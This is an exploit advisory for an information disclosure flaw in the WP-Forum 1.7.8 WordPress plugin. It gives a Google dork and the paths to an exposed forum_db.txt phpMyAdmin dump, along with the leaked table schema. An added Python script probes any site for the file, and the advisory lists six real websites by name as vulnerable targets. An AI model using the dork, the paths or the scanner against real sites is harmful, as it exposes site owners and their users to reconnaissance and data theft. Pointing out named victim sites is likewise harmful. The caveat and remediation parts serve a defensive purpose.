- ###########################################################################
- # Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 27/03/2019
- # Vendor Homepage : wordpress.org
- # Software Information Link :
- github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt
- wordpress.org/plugins/tags/wp-forum/
- # Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Acunetix Information Link about phpMyAdmin SQL dump File =>
- acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
- # Reference Link : cxsecurity.com/ascii/WLB-2019030225
- ###########################################################################
- # Information About Software :
- ****************************
- A simple discussion forum plugin for WordPress, with support for different skins (3 included
- by default) that can be changed from the WP admin interface. The admin can choose whether
- unregistered posting is allowed, and an optional Captcha is used for spam control. Tight
- integration with WordPress makes the plugin easy to use and administer.
- # Installation :
- *************
- 1. Rename wpforum to wp-forum and copy it to wp-content/plugins
- 2. Go and activate the plugin
- 3. Create a page from the Manage tab
- 4. Click on the HTML button in WordPress and then insert: `<!--WPFORUM-->`
- 5. Go to manage->wp-forum and start adding groups and forums.
- 6. You must then visit the WP-Forum options panel in WP admin.
- 7. Set up a link to your forum (unless you have your pages auto-linking in the navigation menu)
- 8. To show the latest activity in the sidebar add this code:
- `<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3
- 9. If you upload a new version, go to plugin management, deactivate and then activate
- WP-Forum. Then visit the structure page of the wp-forum management.
- ###########################################################################
- # Impact :
- ***********
- * An information exposure is the intentional or unintentional disclosure of information to
- an actor who is not explicitly authorized to have access to that information.
- * The product stores sensitive information in files or directories that are accessible
- to actors outside of the intended control sphere.
- * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
- MySQL over the World Wide Web. It can be used to dump a database or a collection of databases
- for backup or transfer to another SQL server (not necessarily a MySQL server).
- The dump typically contains SQL statements to create the tables, populate them, or both.
- The forum_db.txt file contains a phpMyAdmin SQL dump. Such a file is highly sensitive
- and should not be found on a production system.
- * Caveat : the dump reproduced in this advisory consists of CREATE TABLE statements only, with
- no INSERT rows, so what it discloses is the forum table schema, the table prefix in use and the
- phpMyAdmin, MySQL and PHP versions the file was generated with. Before rating a given site as
- exposing user data (for example the author_email column of wp_forum_posts), check whether its
- copy of the file also contains INSERT statements.
- Remediation : Restrict web access to this file (for example, deny .txt and .sql files under
- wp-content/plugins at the web server) or remove it from the system.
- ###########################################################################
- # Database Disclosure Exploit :
- ***************************
- /wp-content/plugins/wp-forum/forum_db.txt
- /wp-content/plugins/wp-form/wpforum/forum_db.txt
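The following is an added example (not part of the original advisory and not code from the WP-Forum plugin) that probes the two paths above and fingerprints the response body instead of trusting the HTTP status, because a WordPress site commonly answers a missing file with a themed 404 page and HTTP 200. It parses the phpMyAdmin header for tool versions, lists the CREATE TABLE names, and only reports data exposure when INSERT rows are actually present. The sample bodies are constructed, and the path list, constant names and function names are this example's own.

```python
"""Probe for an exposed phpMyAdmin SQL dump such as wp-forum/forum_db.txt.

Added example for this advisory, not code from the original post or the
WP-Forum plugin. analyze_dump() runs offline on the constructed samples
below; fetch_and_check() is the live probe (assumes HTTP(S) reachability).
"""
import re
import urllib.error
import urllib.request
from typing import Optional

# Paths listed in the advisory (this example's own constant name).
CANDIDATE_PATHS = (
    "/wp-content/plugins/wp-forum/forum_db.txt",
    "/wp-content/plugins/wp-form/wpforum/forum_db.txt",
)

# Header lines phpMyAdmin writes at the top of every export.
HEADER_RE = re.compile(r"^\s*--\s*phpMyAdmin SQL Dump", re.MULTILINE)
PMA_VERSION_RE = re.compile(r"^--\s*version\s+(\S+)", re.MULTILINE)
SERVER_VERSION_RE = re.compile(r"^--\s*Server version:\s*(\S+)", re.MULTILINE)
PHP_VERSION_RE = re.compile(r"^--\s*PHP Version:\s*(\S+)", re.MULTILINE)
CREATE_RE = re.compile(r"CREATE TABLE\s+`?(\w+)`?", re.IGNORECASE)
INSERT_RE = re.compile(r"^\s*INSERT INTO\s+`?(\w+)`?", re.IGNORECASE | re.MULTILINE)
# A column definition line inside CREATE TABLE: "  `author_email` varchar(255) ..."
COLUMN_RE = re.compile(r"^\s*`(\w+)`\s+\w", re.MULTILINE)
SENSITIVE_TERMS = ("email", "pass", "hash", "token", "secret", "salt")


def _first(regex, body):
    m = regex.search(body)
    return m.group(1) if m else None


def analyze_dump(body: str) -> Optional[dict]:
    """Return findings if `body` is a phpMyAdmin export, else None.

    The decision is made on the body, never on the status code, so a
    WordPress soft 404 (HTML with HTTP 200) is rejected.
    """
    if not HEADER_RE.search(body):
        return None
    tables = CREATE_RE.findall(body)
    tables_with_rows = sorted(set(INSERT_RE.findall(body)))
    columns = COLUMN_RE.findall(body)
    sensitive = sorted({c for c in columns
                        if any(t in c.lower() for t in SENSITIVE_TERMS)})
    data_exposed = bool(tables_with_rows)
    if data_exposed and sensitive:
        severity = "row data with sensitive columns"
    elif data_exposed:
        severity = "row data"
    else:
        # CREATE TABLE only: schema, table prefix and tool versions leak,
        # but no user content. That is what the dump in this advisory shows.
        severity = "schema and version disclosure"
    return {
        "phpmyadmin_version": _first(PMA_VERSION_RE, body),
        "server_version": _first(SERVER_VERSION_RE, body),
        "php_version": _first(PHP_VERSION_RE, body),
        "tables": tables,
        "tables_with_rows": tables_with_rows,
        "sensitive_columns": sensitive,
        "data_exposed": data_exposed,
        "severity": severity,
    }


def fetch_and_check(base_url: str, paths=CANDIDATE_PATHS, timeout: float = 10) -> dict:
    """Live probe: GET each candidate path and fingerprint the body."""
    findings = {}
    for path in paths:
        url = base_url.rstrip("/") + path
        req = urllib.request.Request(url, headers={"User-Agent": "forum_db-check/1.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read(512 * 1024).decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            continue
        result = analyze_dump(body)
        if result:
            findings[url] = result
    return findings


# Constructed samples (not real captures): a trimmed copy of the advisory's
# schema-only dump, the same dump with one INSERT added, and a soft 404 page.
SAMPLE_SCHEMA_ONLY = """-- phpMyAdmin SQL Dump
-- version 2.7.0-pl2
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.0.19
-- PHP Version: 5.1.4
--
-- Database: `wordpress`
--
CREATE TABLE `wp_forum_posts` (
  `id` int(11) NOT NULL auto_increment,
  `author_name` varchar(255) default NULL,
  `author_email` varchar(255) default NULL,
  `text` longtext,
  PRIMARY KEY  (`id`)
) ;
"""
SAMPLE_WITH_ROWS = SAMPLE_SCHEMA_ONLY + (
    "INSERT INTO `wp_forum_posts` VALUES (1, 'alice', 'alice@example.invalid', 'hi');\n"
)
SAMPLE_SOFT_404 = "<!DOCTYPE html><html><head><title>Page not found</title></head></html>"

if __name__ == "__main__":
    for name, sample in (("schema-only", SAMPLE_SCHEMA_ONLY),
                         ("with rows", SAMPLE_WITH_ROWS),
                         ("soft 404", SAMPLE_SOFT_404)):
        print(name, "->", analyze_dump(sample))
```

Against a live target, `fetch_and_check("https://example.invalid")` returns only the URLs whose body carried the phpMyAdmin header, each with its severity, so a page that merely returns 200 for every path is not counted as a finding.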
- # Information :
- **************
- -- phpMyAdmin SQL Dump
- -- version 2.7.0-pl2
- -- phpmyadmin.net
- --
- -- Host: localhost
- -- Server version: 5.0.19
- -- PHP Version: 5.1.4
- --
- -- Database: `wordpress`
- --
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_forums`
- --
- CREATE TABLE `wp_forum_forums` (
- `id` int(11) NOT NULL auto_increment,
- `name` varchar(255) NOT NULL default '',
- `parent_id` int(11) NOT NULL default '0',
- `description` varchar(255) NOT NULL default '',
- `views` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_groups`
- --
- CREATE TABLE `wp_forum_groups` (
- `id` int(11) NOT NULL auto_increment,
- `name` varchar(255) NOT NULL default '',
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_posts`
- --
- CREATE TABLE `wp_forum_posts` (
- `id` int(11) NOT NULL auto_increment,
- `author_name` varchar(255) default NULL,
- `author_email` varchar(255) default NULL,
- `author_web` varchar(255) default NULL,
- `text` longtext,
- `thread_id` int(11) NOT NULL default '0',
- `date` datetime NOT NULL default '0000-00-00 00:00:00',
- `author_id` int(11) NOT NULL,
- `subject` varchar(255) NOT NULL,
- `views` int(11) NOT NULL,
- PRIMARY KEY (`id`)
- ) ;
- -- --------------------------------------------------------
- --
- -- Table structure for table `wp_forum_threads`
- --
- CREATE TABLE `wp_forum_threads` (
- `id` int(11) NOT NULL auto_increment,
- `forum_id` int(11) NOT NULL default '0',
- `views` int(11) NOT NULL default '0',
- `subject` varchar(255) NOT NULL default '',
- `date` datetime NOT NULL default '0000-00-00 00:00:00',
- PRIMARY KEY (`id`)
- ) ;
- ###########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt
- [+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt
- [+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt
- [+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt
- [+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt
- [+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt
- ###########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###########################################################################